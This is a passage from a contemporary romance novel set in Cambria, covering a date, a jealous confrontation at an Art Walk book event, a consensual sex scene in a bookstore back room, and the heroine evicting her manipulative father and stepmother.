Because they were alone in the theater, they had the luxury of heckling the movie, just as Kate had suggested, without annoying anyone. Jackson turned out to be funnier than she'd expected, and some of his observations about the acting and the cheesy plot developments had her laughing until her stomach ached. When he made a bad pun, she pelted him with a Jujube. This led to him lobbing a Milk Dud back at her. And that led to her looking at him in the dim light from the screen with amusement and pleasure in her eyes.
He leaned over and kissed her. He tasted like chocolate and caramel.
After the movie, they emerged, squinting, into the sunlight. They walked across the street to a place that sold hamburgers, hot dogs, and french fries through an ancient-looking window surrounded by peeling paint. They bought chili dogs and fries and carried them to a picnic table sheltered by a big umbrella.
Kate dug into her food with gusto. Jackson did, too, to her surprise. She'd have thought he was too much of a food snob to enjoy a good chili dog.
"I hadn't pegged you for a chili dog kind of guy," Kate observed.
"Why? Just because I'm a chef?" He shook his head. "There's a certain perfection to a chili dog, especially one that oozes chili all over your fingers when you eat it. I like a Big Mac on occasion, too."
"Huh," she said. "Who'd have thought?"
They ate in happy silence, and they wiped the chili off of their hands and faces with flimsy paper napkins. Then they sat under the umbrella, enjoying the light breeze and the smell of the ocean.
"So," he said.
"So, I want to ask you about this guy Marcus... "
"My husband. Ex-husband."
"... But I don't know if that's a sensitive topic. I want to know, but I don't want to ruin a really good date."
Kate shrugged. "It's okay. I don't mind talking about him. I would have minded as recently as six months ago. It was hard for a long time. But now... " She searched for words. "Now, none of it seems to matter that much anymore. I've moved on."
He nodded. He wadded up their used napkins and wrappers and tossed them into a nearby trash can.
"You said you met him in grad school," he prompted.
"Right. I met him at a party the English department was hosting. He was there with a girl from a seminar I was taking. He was drunk. That should have been my first clue that he wasn't right for me." She shook her head at the memory.
He leaned toward her, resting his forearms on the picnic table. "What was the attraction?"
"He was really charming at first. Attractive. Brilliant. He had this thing, this way of turning his attention on someone and making them feel like the most important person in the world. It's only later that you see that _he's_ the most important person in his world."
"Were you ever happy together?" he asked. "Before things started to go wrong?"
She sighed and considered the question. A gentle breeze blew through her hair. Nearby, seagulls picked at a few discarded french fries.
"I thought we were happy," she said. "At first. But what I thought was happiness was just me having not caught on to him. He was cheating from the beginning. Before the wedding, even. I had no idea. And then later, when I did have an idea, he always made it about me. About how I was too insecure to trust anyone. How I was inventing scenarios in my mind to conform with the twisted view I had of men. How he could never win with me, because I was damaged and wasn't capable of a healthy relationship."
She saw the muscles in his jaw flex with what might have been anger. "And you believed him?"
"I didn't know what to believe. When your two choices are to believe that you're emotionally stunted, or to believe that your husband is cheating on you with every woman he can get his hands on and that he never loved you, the first option looks pretty attractive."
He nodded. "I can see that."
"What about you?" she said.
"Have you had any serious relationships?"
He laughed lightly. "Not since Debra Ferguson in twelfth grade."
"Ooh. Tell me about Debra Ferguson."
"She was a cheerleader. With a ponytail. God, I loved her ponytail."
She grinned. "The tiny skirts and the pompoms probably didn't hurt."
"No." He smiled wistfully. "I lost my virginity to her in the back of my dad's 1986 Buick LeSabre."
"Let me guess," Kate said. "You went your separate ways after graduation."
"No." He raised his eyebrows thoughtfully. "No, no. We stayed together for a couple years after graduation. We were engaged for a while."
This was taking a turn Kate hadn't anticipated. "Engaged?"
"Yeah." He nodded. "I had a job busing tables and she worked as a checker at a grocery store. We were gonna get an apartment, have a cheap wedding because it was all we could afford. Then we'd have some kids, the whole bit."
She leaned toward him. "So, what happened?"
He shrugged. "The accident happened."
"The car accident."
"Yeah. I went through... some things after that. I was in the hospital for a while, and then I had some problems with depression. It was too much for her. She broke it off."
Kate reached out and put a hand on his arm. "That's awful."
"Ah, I don't know. It was for the best. Getting married right out of high school... it was never gonna work out. Better to know that up front."
"She doesn't sound like a very good person," Kate said.
He shook his head. "It wasn't her fault. She was a kid. We both were."
Before heading back to his truck, they walked toward the water and sat on the beach, wiggling their bare toes in the wet sand.
"I probably should get back to the shop and relieve Fury," Kate said. Overhead, seagulls soared and dipped and soared again. Down the beach, some kids were making a sandcastle with a red plastic shovel and a pail.
"You want to go?" he said.
"No. I want to stay here with you." She leaned over and rested her head against his shoulder. He put an arm around her, and they sat that way for a long time.
Finally, when they knew they couldn't delay it any longer, they put their shoes back on their sandy feet and made the walk to where he had parked. They drove back to Cambria with her hand in his.
# 19
The fact that Date Four was over—and the ever-critical Date Five was looming—ratcheted up Kate's tension even further. She asked Jackson if there was any way they could find some time for a date before Art Walk—any time at all—and he gave her that seductive laugh and urged her to be patient. He didn't want to rush Date Five. It couldn't be a lunch in the middle of their work day, it couldn't be a drink after Jackson got out of the restaurant in the late hours. No, Date Five had to be done right. He had plans, he said. Important Date Five plans, for Monday.
Knowing that Jackson was the one saying no to sex, and Kate was the one urging him to recklessly surrender to passion, was strange and somehow empowering. A lifetime of being female had taught Kate that the traditional roles were for the male to pressure and the female to resist. It was how things had worked all of her teenage and then adult life. Forces ranging from her upbringing to the media said the man was supposed to want it; the woman was supposed to use sex only for procreation and to tip the scales of power in the relationship. She wasn't supposed to have normal, adult desires, and she certainly wasn't supposed to assert those desires.
The way those desires were raging inside her, and having made no secret of that to Jackson, felt freeing. She didn't need candles and rose petals and soft music, but apparently _he_ did, and that thought made her smile.
She thought about that, and about the various carnal delights Date Five would have to offer, on Friday night after work as she, Gen, Rose, and Lacy discussed their plans for Art Walk the next day.
They were sitting around the dining table in the cottage Rose rented in a woodsy neighborhood east of Highway 1. The tiny house, which had been standing for more than a hundred years, was charmingly rustic—though Rose would have used the word "dilapidated." The knotty pine paneling and freestanding cast iron fireplace made it feel like they were at camp.
"A lemur?" Lacy asked. They were sharing a bottle of white wine and a big bowl of popcorn, all of them dressed in their "girls' night in" ensembles of T-shirts and sweatpants.
"A ring-tailed lemur," Kate confirmed. "Did you know they spread this lemur stink all over everything to mark territory and establish dominance? But humans can't detect the smell. Thankfully. Otherwise, that might have been a deal-breaker."
"Huh," Gen said. "It's going to be just like when Johnny Carson had that zoo lady on his show."
"Joan Embery," Rose supplied.
"Right." Gen pointed a finger at her. "That's her."
"The little bugger's going to poop on my floor," Kate said. "I just know it." She asked Gen, "What about you?"
"I'm not going to poop on your floor," Gen said. "Though, you should probably keep an eye on the tourists."
"Very funny."
Gen had an art demonstration at the gallery, with a wine and cheese reception. Rose's wine tasting shop would be presenting a lecture on how to do proper wine and food pairings, with a wine and hors d'oeuvre tasting. Jitters—which expected to do a brisk business with all of the foot traffic—would have live music. An acoustic guitarist, as you'd expect from any self-respecting coffee house.
"I hate Art Walk," Kate declared. "It's always so much work, and this year it's delaying my gratification with Jackson. I don't want my gratification delayed. I want my gratification now."
"You poor thing," Gen said soothingly.
Rose raised her eyebrows, one pierced with a stainless steel barbell. "It's been a while, hasn't it? Since you've been... you know... gratified."
"So long," Kate confirmed. "So, so long."
"Hey. You know what would be gratifying?" Gen asked.
"What?" Kate said.
"Kicking your father and Angela out of your house."
Kate groaned. "I know. I need to. I just have to figure out how."
"I'll do it," Rose offered. "Just say the word, and I'll have their asses out on the curb before you can say Daddy Dearest."
"I'll do it," Kate said again. "I will. I just... I need time."
Gen groaned.
"Oh, honey," Kate said. "I'm so sorry about invading your personal space. But at least after Monday I should be sleeping a lot better."
Gen raised her wineglass in a mock toast. "Here's hoping."
As Kate was leaving her house on Saturday to go to work—it would be a long day, beginning midmorning and ending well after midnight—a grey Toyota Corolla slowed down on its way past her street and paused in front of her house. The window rolled down, and a man in his midfifties poked a smartphone out the driver's side window and started taking pictures.
_Tourists. God only knows why they do what they do._
The man with the phone spotted Kate emerging from Gen's downstairs apartment and called out to her.
"Do you live here?" he said.
"I do. How can I help you?" She was slightly annoyed and in a hurry, but the courtesy that came with running a business took over.
"Quite a location," he said.
"Yes, I love it here."
"What are the property taxes like?"
She approached the car, which had Oregon plates. "Oh, are you thinking of relocating?"
"Maybe, if I can get the right deal." He winked at her.
"Well, it's a lovely town," Kate offered.
"It sure is." He pointed at the house. "You got central heating in there?"
"Um... no."
"Ah. Hmm."
"Okay, well," Kate said, trying to end the conversation. "I have to get to work. Have a good day!" As she walked to her car, she saw the man park the car, get out, and stand with his hands on his hips, looking at her house.
A little creeped out, Kate waited in her car until the guy drove away. If he'd intended to burglarize her place, surely he'd have been more stealthy about it. And it certainly wasn't unusual for visitors to Cambria to scope out the local real estate, asking questions and taking pictures.
Still, she had a bad feeling, and somehow, she connected it with her father.
Saturday evening brought perfect weather for the event. Cool but not cold, clear skies, light breeze off the ocean with the enticing scent of salt water.
Kate arranged the canapes, the napkins, and the plastic drink cups; Fury straightened the rows of folding chairs; and Cassidy McLean, who had arrived right on time toting Samantha in a plastic cat carrier, was arranging a stack of her books on a table for signing.
Kate checked her watch: six thirty p.m.
"Okay," she told Fury. "Open the doors!"
He propped open the front door of the shop and put out the sandwich board announcing that Cassidy McLean would be speaking at seven thirty and again at nine, with book signings after each presentation. In smaller print, the sign advertised refreshments, a special sales promotion, and Fury's "name the book and win it" contest.
Kate took a deep breath and girded her loins for the evening to come.
It looked like they were going to get pretty good crowds. As soon as the doors opened, people starting coming in and milling around, browsing the books, nibbling on the little cheese puffs and pigs in blankets. Kate and Fury greeted everyone, made small talk, made sure everyone knew Cassidy would be speaking soon. Cassidy did her part as well, chatting with the locals and tourists about her experience in the movies and her life at the wild animal refuge. Kate noted with approval that Cassidy was subtle about pushing her book, letting her own personality sell it rather than shoving it in people's faces. The woman was a pro.
Things were going smoothly enough that, with plenty of time left before Cassidy's talk, Kate left Fury in charge for a bit and went out onto Main Street to see what everyone else was doing for their events.
The Porter Gallery was holding a live drawing demonstration, with an artist sketching a model who was draped gracefully in billowy white cloth, her bare shoulders and legs emerging from beneath the folds of fabric. Gen had briefly considered using a nude model—because, after all, the idea was to create a stir and draw a crowd—but rejected the idea when Kate had pointed out how many children people brought with them for Art Walk.
De-Vine seemed to have a good crowd for the talk on wine and food pairings. Kate ducked in just long enough for a couple of exquisitely presented bite-sized morsels and a few sips of a fragrant, rich cabernet sauvignon.
She made small talk with people she encountered along the way: her regular customers, her neighbors, people she knew from the gas station and the library and the clothing boutiques. Main Street had a festive, carnival atmosphere that almost made her wish she were a tourist instead of a business owner with a job to do.
On her way back toward the shop, she passed a street performer playing the saxophone, a food cart offering fresh-made tacos, and a guy selling helium balloons that lit up from the inside.
She checked the time on her cell phone and decided she just had time to drop in on Lacy before heading back to Swept Away.
The coffee house was about three-quarters full, with a line at the counter and most of the tables occupied. The guitarist was already performing—he was a scraggly looking guy singing a mournful version of James Taylor's "You've Got a Friend."
Kate snagged Lacy as the other woman was taking a couple of lattes to a couple sitting at a round table by the door. After Lacy delivered the drinks, Kate asked, "How's it going?"
"Good." Lacy nodded. "People seem to like Bob."
"The singer." She gestured. "Though he's a little heavy on the James Taylor. We've already heard 'Fire and Rain' and 'Sweet Baby James,' and it's not even seven thirty."
People did seem to be enjoying the music; they were looking attentively at the makeshift stage, interested, enjoying their coffees.
"How about you?" Lacy asked. "How's it coming over there?"
"Okay, I guess. Cassidy McLean seems great. But I'm nervous."
Lacy rubbed Kate's upper arm. "Hang in there. It's just one night!"
"Right." She nodded. "Right."
Kate looked around and saw people she knew, and people she didn't know. Peering into the dim light of the coffee house, she spotted a familiar face she hadn't expected to see.
"Is that Zach?" she whispered to Lacy, just loud enough to be heard over the guitarist.
"Uh huh," Lacy confirmed. "Caramel macchiato, no whip."
"Is that his wife?" Kate was curious. The woman sitting with Zach was lovely, all silky black hair and smooth, creamy skin. It was hard to tell in the dim lighting, but she didn't look happy.
"I guess so," Lacy said. "I didn't ask."
"Hmm." Kate caught a glance at her watch. "Shit! Gotta go. Good luck!"
She dashed out the door and back to Swept Away, where the crowd was starting to find seats for Cassidy's talk. Her father and Angela were sitting third row center. Jazzy was poking his fuzzy little head out of Angela's purse. At least that meant he wasn't home eating Kate's favorite jeans.
"Dad," she said. "Angela. You came."
"Of course we came," her father said, puffing up a bit. "I wouldn't miss my daughter's big night!"
"We do this every year," she said. "This is the first time you've come."
"Ah. Well... "
"You know, they've got a terrific guitarist next door. Maybe you should... "
Her less-than-subtle effort to get him out the door was interrupted as Cassidy nodded to Kate that she was ready to begin.
Kate went to the front of the room, where she'd set up a lectern. "If everyone could please take their seats!" She waited while people shuffled around each other and settled into the folding chairs, holding little napkins full of food in their laps.
Once everyone had settled, she launched into her welcome speech: "I'd like to thank you all for coming out tonight. Welcome to Swept Away." There was a smattering of applause. She gave a brief bio of Cassidy McLean, which included the highlights of her film career and the history of the animal refuge she'd opened with her husband. Kate finished up with a hearty endorsement of _Wild Woman_ , Cassidy's book. "Let's all give a friendly Swept Away welcome to Cassidy McLean," she said, leading a round of applause and stepping to the side.
Cassidy took the lectern, opened a copy of _Wild Woman_ , and started to read a passage she and Kate had picked out beforehand. The plan was that after the reading, she would bring out Samantha and talk about ring-tailed lemurs, as well as the many other species she housed on her property.
While Cassidy talked, Kate surveyed the refreshment table, which was starting to look a little bare. "Could you go into the back and get some more canapes?" she asked Fury. "The iced tea looks a little low, too."
"I'm on it," he told her, disappearing into the back room.
She took a look at the crowd. About thirty people had gathered for the event, which was, frankly, a better turnout than she'd expected based on previous years. She noticed that the audience was mostly older; probably people who remembered Cassidy McLean's glory years in movies.
A steady stream of foot traffic was going by on the sidewalk, and a few more people came in to listen to the talk.
When Samantha came out, the crowd gasped in delight. The black and white creature was about a foot and a half long, with eyes ringed in black and a long, striped tail that she swished about to great effect. As Cassidy talked about how Samantha had come to the refuge, and about ring-tailed lemurs in general, Kate noticed Zach and his ex-wife, Sherry, standing in the open door to the bookstore. Sherry, she of the Miss World bone structure, was scowling, her arms crossed over her chest.
"Is that her?" Sherry said, pointing at Kate.
Zach put a hand on Sherry's shoulder and said something to her that Kate couldn't hear.
"I just want to talk to her," Sherry said.
Again, Zach leaned toward Sherry's ear and murmured something to her.
"I don't give a shit!" Sherry said, causing numerous people in the audience to turn around to look at her. "I just want to talk to this bitch!"
Kate didn't know what was happening, but it didn't seem like anything good. She asked Fury to hold down the fort and charged toward the front door to head off any trouble before it came into her store.
"Is there something I can help you with?" she asked the couple.
"Kate," Zach said. "I'm really sorry. I... "
"You shut your mouth," Sherry said, throwing him a look that would have immolated him, had she been gifted with pyrokinesis.
"Maybe we should step outside," Kate said. She led Zach and Sherry out onto the sidewalk. Then, considering, she closed the front door of the bookstore behind them so the customers inside wouldn't hear whatever was about to happen.
"Now. What's this about?"
"It's about you screwing my husband," Sherry said.
"What? I never... "
"Sherry," Zach said.
"That was your house where we had dinner, wasn't it?" she demanded. "Don't lie, you skank."
"Hey!" Kate protested. "Let's just back up a bit."
Sherry grabbed Zach's cell phone out of his hand and pulled up the lengthy call history between him and Kate. Then, triumph on her face, she pulled up their texts and shoved the phone into Kate's face.
"Did you _read_ the texts, Sherry?" Zach demanded. "Because if you did, you'd see there was nothing in there! Just friendly, innocent, how-was-your-day kind of stuff!"
"Why were you asking her how _her_ day was?" Sherry said, on the verge of tears. "Why weren't you calling _me_ , asking _me_ how _my_ day was? And then you took me to her _house_... "
"Sherry. Honey."
He put a hand on her arm, and she shook it off. "Don't touch me!"
"We planned that dinner for _you_ ," Kate tried.
" _You_ planned it?! _You?!_ " Sherry was spinning into near hysteria. She grabbed Kate by the shoulders and started shaking her. "I'm going to beat your scrawny ass!" she screamed.
A crowd was starting to gather as Zach grabbed Sherry and tried to pull her away. Kate was just starting to think about the self-defense classes she'd taken in college—aim for the eyes, she recalled—when Sherry suddenly let go of her and moved backward three feet as though displaced by an alien ray gun. Kate stood there stunned, wondering what had happened, and then she saw Jackson, who'd appeared out of nowhere, setting the other woman down on the sidewalk and standing in front of Kate, blocking Sherry's access to her.
"Where did you come from?" Kate said, stunned.
"What the hell is going on here?" Jackson demanded of Zach.
"I'm sorry, man," Zach said. "My wife, she gets a little jealous."
"Wife?" Sherry demanded. "I'm not your wife anymore, you cheating asshole!"
Jackson looked over his shoulder at Kate. "You slept with this guy?"
"No!" Kate said.
"No, no!" Zach said. He likely would have said that whether it were true or not, considering that Jackson was taller than him and outweighed him by a good fifty pounds.
"Somebody had better make things clear to me," Jackson said, a threat in his voice.
"Sherry saw the phone calls and texts between me and Zach," Kate said. "When we were planning the dinner."
"Then there were the calls to your landline when I was doing comps for the house," Zach added.
"Comps?" Kate said.
"Yeah, for the house," Zach repeated. "I told you before, I was talking to her _dad_ , for Christ's sake," he said to Sherry.
"You're selling your house?" Jackson asked Kate, turning to look at her.
"You're not?" Zach said. "But your dad... "
"Wait!" Kate waved her hands wildly in front of her face in an effort to clear away her confusion. "My dad? What exactly did he say to you?"
_"Hello!"_ Sherry said. "Can we get back to how he's a cheating asshole and you're a skanky whore?"
"I am _not_ a skanky whore!" Kate yelled.
As the altercation got louder, people started to come out of the store to watch the much more entertaining scene playing out on the sidewalk. Kate saw that her father and Sherry were among the gawkers.
"Dad. Did you tell Zach I was selling my house?" Kate demanded.
"Well, I... "
"He said he wanted to know what it would go for, get the ball rolling," Sherry said, now having apparently forgotten about her initial mission.
"Get the... What the... " Kate sputtered in her anger and disbelief. Suddenly, the guy taking pictures of her house made sense.
"I just thought... " Thomas began.
"That is _it,_ " Kate yelled. "That is goddamned _it_!"
"Don't you talk to your father that way!" Angela demanded. "Oh! My blood pressure!"
At that moment, Jazzy, apparently upset by the yelling, leaped out of Angela's purse and darted into the bookstore, tearing after the lemur, who was cradled in Cassidy McLean's arms. Jazzy barked, yipped and yelped. Samantha let out a loud, wailing howl and sprinted out of Cassidy's arms and into the back of the store.
"Jazzy!" Angela cried.
"Oh, shit," Kate said.
Kate heard crashing sounds from inside the store as guests who were uncertain whether lemurs could be dangerous decided that caution was preferable to hospitalization and high-tailed it out onto the street.
"Samantha!" Cassidy cried, rushing into the back room after the lemur and the frenzied little dog.
Kate pushed her way through the crowd and rushed into the store with Jackson behind her. Bringing up the rear was Angela, exclaiming, "If that little ferret hurts my Jazzy... "
"It's not a goddamned ferret," Cassidy McLean yelled at her. "It's a ring-tailed goddamned lemur!"
Kate grabbed Fury. "Clear out the store," she told him. "Get everybody out of here. The last thing we need is for somebody to get bitten." He nodded and rushed around apologizing and herding people toward the door.
Kate, Jackson, Cassidy, Angela, Thomas, Samantha, and Jazzy all were crowded into the tiny back room. Samantha was on top of a cabinet, letting out her horrific, ear-splitting wail, while Jazzy was on his hind legs, front legs planted on the front of the cabinet, growling and yipping.
Kate scooped up Jazzy and turned toward Angela. "Get him out of here!" she said, thrusting the tiny dog into Angela's hands.
"How dare you talk to me like that!" Angela said, her Mary Kay–coated lips in an angry pout.
"You're right. I'll correct my language. Get him _the hell_ out of here." She glared at her father. "And take Jazzy, too."
Behind her, Jackson let out a guffaw.
When Kate's father and stepmother had left with the dog, Cassidy made soothing coos and kissing noises at Samantha. When that didn't work, she offered Samantha some kind of lemur treat she produced from her bag. The lemur scurried down onto Cassidy's shoulder. Cassidy scooped her up and put her back in her carrier.
"Cassidy, I'm so sorry," Kate said.
Cassidy's face was red, her hair askew. "Do you know what could have happened to Samantha? Do you realize how easily she could have gotten hurt?"
"I didn't... I... "
"Come on, baby," Cassidy said to the lemur, carrying the cage back into the main part of the store.
With some semblance of order restored, Kate turned to face Jackson.
"You just appeared out of nowhere and pulled that lunatic off of me. Where did you come from?"
"We got all the food delivered, and I thought I'd stop by."
He looked at her. She looked at him. She was still breathing heavily, her chest heaving. Her emotions were high, her every nerve on high alert.
"Screw Date Five," she said, and launched herself at him.
One second they were feet apart, talking, and the next, she had her body wrapped around him, her mouth on his in an explosion of desire. His arms were around her, his hands in her hair, holding her head to him, his mouth devouring hers. He backed her up against a bookshelf, and books fell to the floor around them.
"Oh. God." Her blood was a river of fire within her. She reached up and grabbed his shirt and ripped it open. Buttons flew.
"Let me just... the door... " With one leg, he reached back and kicked closed the door to the main part of the store.
She ran her hands over his chest, feeling the warm, smooth skin, the hard muscles. He tore off the ripped shirt and pressed his body against hers, putting his mouth on hers, then moving down to her jaw, her neck, the V of skin exposed by her blouse.
"Oh, I... oh..." She couldn't remember ever feeling this, not with Marcus, not with anyone. This urgency, this need. This desire to climb inside of him and be a part of his beating heart.
He started to unbutton her blouse, but then, impatient, he yanked it off over her head. His mouth traveled lower and pressed its warmth to the top of her breast, his tongue exploring.
Kate moaned, a low and throaty sound.
The door to the store started to open as Fury called, "Kate?"
Jackson separated from her just long enough to close the door and search for a lock. "How do I... ?"
"It doesn't lock. Here." She grabbed a crate of books and pushed it in front of the door, and they attacked each other again. This time she was the one who shoved him up against the wall. A manila folder of paperwork that had been stacked on a shelf above them fluttered its contents around them like fall leaves.
His hands were on her, all over her, and he roughly pulled her skirt up until it was bunched around her waist. He grabbed her ass and pulled her to him, and she felt his arousal against her body.
"Maybe we should stop. This isn't how I wanted to do this," he began, his voice a husky rasp.
"This is Date Five," she said, desperate to have his naked body pressed against hers.
"What? This is... "
"You're my date for the Art Walk."
"Kate, that's... "
"Just go with it, Jackson! For Christ's sake!" She unbuckled his belt, and he groaned with pleasure.
He proved to be surprisingly nimble at removing her bra, and she was reminded that he'd had plenty of practice with that sort of thing. But how could she be anything but grateful for his skill? For the masterful way he handled her as his hot mouth closed over her breast.
She felt crazy, driven mindless by the force of her need. She grappled with his zipper, and then when he was freed of his pants she wrapped her hand around him and heard him breathe her name.
A knock came at the back door leading to the alleyway. This door did lock, and Kate reached out and turned the dead bolt. "Kate?" Angela rapped on the door. "Kate, open up right this minute. I want to speak to you about the way you treated me and your father. Kate?"
"Ignore her," Jackson murmured into her ear, his body holding her up against the wall. "Just pretend she's not there." His hand went into the waistband of her panties and traveled downward until he found her, all warm and wet for him. He put a finger inside her and she pressed her mouth against the salty skin of his neck to keep from crying out.
"Jackson," she said, her voice a plea. "I can't wait anymore. I can't... "
"Ah, shit," he moaned.
"What? What?"
"Condoms. I don't have any goddamned condoms."
"Wait!" she said. "I do!"
He pulled back from her slightly. "You do?"
"In my purse! In case we couldn't hold out until Date Five!"
He smiled seductively. "I love a woman who's prepared."
"There's no time for banter! Just get them!"
She pointed a few feet away, to where her purse sat on a shelf. Without releasing her, he lunged for it, hunted around inside, then finally dumped it out, scattering her wallet, pens, lipsticks, tampons.
"There!" She pointed.
He grabbed a little square packet and ripped it open with his teeth. With the business of safety attended to, he hooked his fingers into the waist of her panties and pulled them down, then lifted her up onto him, her back pressed against the plaster wall.
She felt so many sensations. His body in hers, thrusting urgently. The taste of his skin, salty and hot. The feel of his breath on her, the sound of his voice moaning her name. The raw, aching need in the center of her body, building, building, rushing to a devastating crescendo.
When her orgasm hit, she felt like she was flying apart. She cried out, mindless to the fact that someone might hear, aware only of him and the way he made her feel.
He moved into her urgently until his own body shuddered with release.
They clung to each other, sticky with sweat, their hearts beating fast, breathing hard. He brought a hand up to smooth a sweaty strand of hair from her forehead. They slowly lowered to the floor, where they sat propped against the wall, wrapped in each other's arms.
"Kate," he said. "Jesus."
"That was... " she said. "I've never... "
"I know. Me neither." He rested his chin on top of her head in a way that made her feel safe, protected.
"I'm not new at this," she said. "But that was... There are no words."
"I know." He paused. "I wanted to do this right. Not in the back room of your store." He looked around them at the mess they had made.
She laughed. "If that was doing it wrong, then doing it right might kill me."
The pounding at the back door came again. "Kate! I can hear you in there!"
Jackson laughed his sexy, husky laugh. "Maybe you should just let her in."
She considered that. "Not a bad idea. It might make her think twice about invading people's privacy."
"Then again, I don't want to share you with anybody right now. Especially her." He kissed the top of her head tenderly.
They sat entwined, naked, floating on the cloud of their afterglow.
"Best Art Walk ever," Kate said.
# 20
Kate and Jackson got dressed the best they could. For Kate, only the flush of her skin and the smudge of her makeup gave her away. But Jackson was left without a shirt, having had his ripped from his body in a hail of buttons and torn fabric.
"What am I supposed to do about this?" he said, holding the ruined garment in his hand.
"Oh. Wow. I'm sorry about that," Kate said.
"Don't get me wrong, I liked it. I might have this framed," he said, gesturing to the shirt. "But what am I going to wear?"
She rummaged around in the back room until she found a carton with some promotional T-shirts left over from an event she'd held a few months before. She sorted through the shirts until she found one that would fit him, and tossed it to him.
"Emily Brontë?" He looked at Kate uncertainly. "How am I gonna explain this to my guy friends?"
"If you tell them this story, you'll be their hero," she said, smirking at him. "Or you could always go bare-chested. That would be my preference, actually."
He snapped her with the T-shirt like a guy in a locker room. "Vixen."
"You bet."
When they were at least reasonably put together and Kate had scooped the contents of her purse back into the bag, Angela banged on the back door again.
"What do you say, Jackson?" Kate asked, her hands planted on her hips, empowered by sexual satisfaction, adrenaline, and not a small amount of pure Jackson Graham. "You want to help me kick my worthless father out on his ass?"
"I wouldn't miss it," he said. "Lead the way."
Kate flung open the back door to find Angela with her fist poised in mid-knock.
"Well, it's about time you opened the door. I have some things to say to you." Angela's face was a mask of indignant fury and Mary Kay lilac eyeshadow. "You owe us an apology. You should be ashamed of yourself. The way you treat us... "
Kate grabbed her purse and pushed past Angela, and she and Jackson headed toward her car.
"Do you need to lock up?" he asked.
"Fury's here. And anyway, I'll be back. This won't take long."
"Kate! You come back here and listen to what I have to say," Angela bleated. "Kate!"
Without looking back, Kate went to her Honda, got in, and fired up the engine. Jackson's butt had barely landed in the passenger seat before she pulled out of the tiny parking lot and headed toward home.
"Are you okay to drive?" Jackson asked, buckling his seat belt. "Not too upset?"
"I feel fine," she said, meaning it. It was the first time she'd felt this fine in a very long time.
When they arrived at her house, she pulled into the driveway with a screech of brakes. She got out of the car and power-walked to the front door. She unlocked it, went inside, and headed across the living room toward the big sliding glass door that opened out onto the balcony. She opened the door wide.
With the way cleared, she went into her bedroom, opened the closet and the dresser drawers, and started gathering armloads of her father's and Angela's belongings. Her arms full of shirts, pants, shoes, belts, and the various pieces of their wardrobes, she went out onto the balcony and heaved everything over the side. Garments fluttered to the damp grass below.
"Kate, are you sure about this?" Jackson said.
"Grab a handful and help me." She went back into the bedroom for another load. Shoes, socks, underwear, belts, T-shirts, all took flight over the balcony railing and landed in a heap on the lawn, startling a doe that had been grazing beneath a tree.
"Here, grab this." She handed Jackson the big, wheeled suitcase. "It's heavy."
Jackson took the suitcase and hefted it into the great beyond.
Toiletries, Angela's makeup case, Jazzy's dog bed. Her father's orthopedic pillow. Their special coffee, her sleep mask, his robe and slippers, all of it sailed into the night and down onto the grass, where a pile of alarming size was forming.
When Kate headed toward the balcony with Thomas's laptop computer, Jackson put a hand on her arm to stop her. "Are you sure you want to throw that?"
She looked at the computer, and then at him. "Shit. You're right." Instead of throwing it, she took it outside, walked down the stairs past Gen's apartment, and placed the laptop on top of the pile of her father's things.
Kate was just coming back up the stairs when Thomas and Angela arrived, piloting the mammoth pink Cadillac.
Angela spotted the mountain of miscellany on the lawn and screamed. Neighbors peeked their heads out of their front doors, inquiring whether everything was okay.
"What in the world is going on here?" Thomas demanded. "Is that how you run your store? Is this how you run your home? It's lucky I'm here. There's no telling what you'd... "
"You're leaving," Kate said.
"How dare you talk to me this way? I'm your father," he said.
"Right. You're my father. Let's just take a look at your performance so far, shall we?" Kate was squared off against him, her hands on her hips, magnificent in her anger. "You were controlling and manipulative the entire time I was growing up. You made my mother miserable. And then you left her for another woman." She glared at Angela. " _This_ woman. You left my mother alone, so that when she was facing the worst time of her life, when she was dying of _cancer_ ,"—her voice broke—"she didn't have the man who had promised to be there until death do you part."
Jackson put a steadying hand on her shoulder, and she took strength from it. "And now, when she's gone, you come here and tell me that you _deserve_ to have this house, _her_ house, as though you already haven't taken enough from her. From me. You force your way in here, take over my home, my bedroom, my life, showing no respect for me, no respect for anything I've built here. And finally," she said, taking a deep breath, "you try to sell my house from under me so you can take and take and take, because you won't be satisfied until I'm left with nothing. No home, no money, no father, and no self-respect. Does that about cover it?"
For once, he was silent. Angela, however, was not. "How can you... "
Jackson pointed a finger at Angela, his look deadly calm. "Don't."
Her mouth snapped shut.
"Where do you expect me to go?" Thomas said.
"I don't care. A Motel 6. A box on the side of the road. Hell. Your choice."
"Never in a million years did I think my daughter would treat me this way," he said.
"Well, it'll be the last time," Kate said. "It'll be the last time I'll have to. Because I'm done with you. I'm finished. It's over. Give me my spare key."
She held her hand out for the key and stared at him. After a moment of hesitation, he picked it out of his pocket and placed it in her palm. She walked into the house, with Jackson behind her. She closed the door, and locked it.
Once she was inside, once the adrenaline of the situation started to drain out of her, she started to shake. "Aw, come here," Jackson said, taking her into his arms. "You did what you had to do. It was the right thing. I'm proud of you."
"I know," she murmured into his T-shirt. "I'm proud of me, too."
"But it's still hard."
"It is."
He was still holding her tightly in his arms when they heard the Cadillac start up and drive away.
Sunday was all clear skies and brilliant sunlight. Kate sipped her first cup of coffee in an Adirondack chair on the deck, watching the breaking waves in the cool of the morning. She'd invited Jackson to stay the night with her, but when he'd come to Swept Away the night before, he'd only expected to drop in to say hello; he'd had things to wrap up at the restaurant and didn't expect to be finished until late. She'd had to return to town, too, to send Fury home and reassure him that she didn't expect the chaos of the evening to be righted all in one night.
Today she'd have to go to work and fix everything—the mess, the damage, the broken things, and especially the rampant small-town talk about everything that had taken place. But now, sitting here in the morning light with a truly excellent cup of coffee, she couldn't get the goofy grin off her face.
"Kate?" The voice was coming from the patio right beneath her deck. Gen.
"Hey," she answered.
"Are you alone?"
Kate smiled. "I am."
"Want company?"
"Sure. Come on up."
She heard Gen's feet padding on the stairs and then heard her come in the front door with the key Kate had given her when Gen had moved in. "Good morning, honey," Gen called to her.
"It really is," Kate answered.
Gen made a stop in the kitchen to pour herself a cup of coffee from the pot and came out onto the deck. She was still dressed in flannel pajamas and fuzzy slippers, her wild mass of red curls piled atop her head. She plopped down into the other Adirondack chair and sipped silently for a few moments.
"Aren't you going to ask?" Kate said.
"About which part? I don't even know where to start."
Kate looked at her with one eyebrow raised.
"Okay, maybe I do know where to start. I heard that you and Jackson... that the two of you went into the back room of the store, and... there were _sounds_." She left the rest dangling there in the space between them.
Kate nodded. "There were, indeed, sounds."
"So you... ?"
"We certainly did."
Gen stomped her feet excitedly against the wood of the deck. "Oh, wow! In the back room of the store? During Art Walk? Oh my gosh. Was it awesome? Kate. Was he awesome? Because it always seemed like he'd be awesome."
